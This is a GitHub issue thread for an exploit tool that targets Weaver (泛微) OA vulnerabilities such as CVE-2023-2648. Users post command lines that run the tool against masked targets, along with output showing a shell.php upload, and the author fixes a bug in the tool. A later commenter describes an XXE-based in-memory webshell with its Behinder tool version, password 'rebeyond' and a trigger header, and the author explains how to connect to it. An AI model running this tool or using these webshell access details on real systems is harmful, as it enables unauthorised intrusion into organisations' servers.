zhaoyumi / WeaverExploit_All

泛微最近的漏洞利用工具(PS:2023)
447 stars 42 forks source link

CVE-2023-2648返回存在,却没有返回正确的shell地址 #2

Open BUZHA opened 1 year ago

BUZHA commented 1 year ago

` .\WeaverExloit-All.exe --target http://XXXXXXX:8989 --poc CVE-2023-2648 2023/06/27 10:50:56 [+] 存在CVE-2023-2648漏洞: http://XXXXXXX:8989/attachment/

<!DOCTYPE html>

用户名:
密码:
XXXXXXX
/shell.php` 这是返回的数据
zhaoyumi commented 1 year ago

好的 随后修复这个BUG

zhaoyumi commented 1 year ago

BUG修改完了 可以下载了

BUZHA commented 1 year ago

谢谢大佬!已修复修复! 下面反馈的数据

PS G:\Desktop\WeaverExploit_All-main> .\WeaverExloit-All.exe --target http://XXXXXX:8989 2023/06/27 20:22:48 [-] 不存在用户信息泄露漏洞 2023/06/27 20:22:48 [-] 不存在QVD_2023_5012漏洞 2023/06/27 20:22:48 [-] 不存在CVE-2023-2523漏洞

<!DOCTYPE html>

用户名:
密码:
XXXX

2023/06/27 20:22:48 [-] 不存在CVE-2023-2648漏洞

nqzh01 commented 1 year ago

存在XML实体注入 可进行getshell [+] 内存马写入成功 请使用冰蝎 3 beat11 密码:rebeyond [+] 访问时增加HTTP请求头:X-Options-Ai 笑死,新手不会连

zhaoyumi commented 1 year ago

url后添加任意文件路径 然后链接,添加请求头X-Options-Ai:1